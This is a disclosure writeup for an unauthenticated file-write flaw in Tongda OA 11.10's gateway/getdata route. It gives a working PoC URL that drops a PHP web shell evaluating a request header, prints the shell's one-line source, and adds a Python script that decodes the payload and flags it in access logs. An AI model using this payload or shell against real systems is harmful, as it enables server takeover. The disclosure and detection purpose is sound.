CVE-2023-2738: cve/tongda.md at main · RCEraser/cve
A vulnerability classified as critical has been found in Tongda OA 11.10. This affects the function actionGetdata of the file GatewayController.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-229149 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Tongda OA v11.10 unauthenticated arbitrary file upload vulnerability
official website: https://www.tongda2000.com/
version: v11.10
- The actionGetdata() method in general\appbuilder\modules\portal\controllers\GatewayController.php reads the activeTab request parameter, which is attacker-controlled. At line 2018 the activeTab value is passed on to the GetData() method.
In GetData(), the id parameter is looked up with findAll(); if a record with that id exists, execution enters the if branch at line 21. The $attribute value built at line 38 is therefore attacker-controlled and is written into a PHP array literal in a file via fwrite(). A value containing a closing quote breaks out of the array element, so the remainder of the value lands in the file as PHP code.
- Reproduction
PoC:
http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage
The activeTab value closes the quoted array element (`%27,1%3d%3E` decodes to `',1=>`), so the injected fwrite(fopen()) call becomes part of the generated PHP file and runs once that file is executed, dropping 1.php into the web root; the trailing `/*` comments out the rest of the original element. The dropped shell takes no request parameter at all: it evaluates the value of the second request header (next() on the array returned by getallheaders()), which sidesteps Tongda's global filtering of GET/POST parameters.
Write the 2.php file with no parameter; its contents are as follows.
```php
<?php eval(next(getallheaders()));
```
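The following is an added example, not code from this writeup or from Tongda OA. It percent-decodes the PoC URL above and splices the activeTab payload into an assumed PHP array literal, so the array closure by `',1=>` and the trailing `/*` can be seen in the rendered file, and it then scans a few constructed access-log lines for requests to the gateway/getdata route whose decoded activeTab carries PHP call syntax. The PHP template (`PHP_TEMPLATE`), the helper names and the sample log lines are assumptions; the real GetData() sink is not reproduced.

```python
"""
Added example; not code from the RCEraser/cve writeup or from Tongda OA.

1. Decode the PoC query and splice activeTab into an ASSUMED PHP array
   literal, to show how `',1=>` closes the element and `/*` comments out
   what follows.
2. Flag access-log requests to gateway/getdata whose decoded activeTab
   contains a PHP function call or an array-element arrow.
"""
import re
from urllib.parse import unquote, urlsplit

# The PoC URL exactly as given in the writeup.
POC_URL = (
    "http://url/general/appbuilder/web/portal/gateway/getdata?"
    "activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),"
    "%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage"
)


def decode_query(query: str) -> dict:
    """Split a raw query string into {name: value}, percent-decoding only.

    latin-1 keeps the lone %e5 byte as one character instead of U+FFFD;
    '+' is left literal (the PoC uses it inside the fopen mode string).
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote(name, encoding="latin-1")] = unquote(value, encoding="latin-1")
    return params


def decode_poc(url: str) -> dict:
    """Decoded parameters of a full PoC URL."""
    return decode_query(urlsplit(url).query)


# ASSUMED shape of the generated file: the request value is interpolated
# straight into a single-quoted array element and written out with fwrite().
PHP_TEMPLATE = "<?php\n$config = array('activeTab' => '{active_tab}', 'id' => '{id}');\n"


def render_config(params: dict) -> str:
    """Naive interpolation sink in the pattern the writeup describes (assumed)."""
    return PHP_TEMPLATE.format(active_tab=params.get("activeTab", ""), id=params.get("id", ""))


# Detection: gateway/getdata route plus PHP syntax in the decoded activeTab.
GATEWAY_PATH_RE = re.compile(r"/general/appbuilder/web/portal/gateway/getdata", re.I)
PHP_SYNTAX_RE = re.compile(r"\b(?:fwrite|fopen|file_put_contents|eval|system|assert)\s*\(|=>", re.I)
# Apache/nginx combined-format request line: "METHOD target HTTP/x.y"
LOG_LINE_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_suspicious_target(target: str) -> bool:
    """True for a path+query hitting getdata with PHP syntax in activeTab."""
    path, _, query = target.partition("?")
    if not GATEWAY_PATH_RE.search(path):
        return False
    active_tab = decode_query(query).get("activeTab", "")
    return bool(PHP_SYNTAX_RE.search(active_tab))


def scan_access_log(text: str) -> list:
    """Client addresses of log lines whose request matches the getdata pattern."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if m and is_suspicious_target(m.group("target")):
            hits.append(m.group("client"))
    return hits


# Constructed sample log (not real traffic): a benign getdata call, the PoC,
# the follow-up fetch of the dropped 1.php, and unrelated traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2023:10:01:02 +0800] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=news&id=266&module=Carouselimage HTTP/1.1" 200 512
10.0.0.9 - - [10/May/2023:10:01:09 +0800] "GET /general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage HTTP/1.1" 200 0
10.0.0.9 - - [10/May/2023:10:01:15 +0800] "GET /general/1.php HTTP/1.1" 200 17
10.0.0.7 - - [10/May/2023:10:02:00 +0800] "GET /general/index.php HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    print(render_config(decode_poc(POC_URL)))
    print("flagged clients:", scan_access_log(SAMPLE_LOG))
```

Running it prints the rendered array line with `'activeTab' => 'å',1=>fwrite(fopen(...` followed by `/*`, which is the closure the writeup describes, and flags only the client that sent the PoC. Matching is done on the decoded value on purpose: the PoC percent-encodes the quote, `=` and `>`, so a pattern applied to the raw query would miss it.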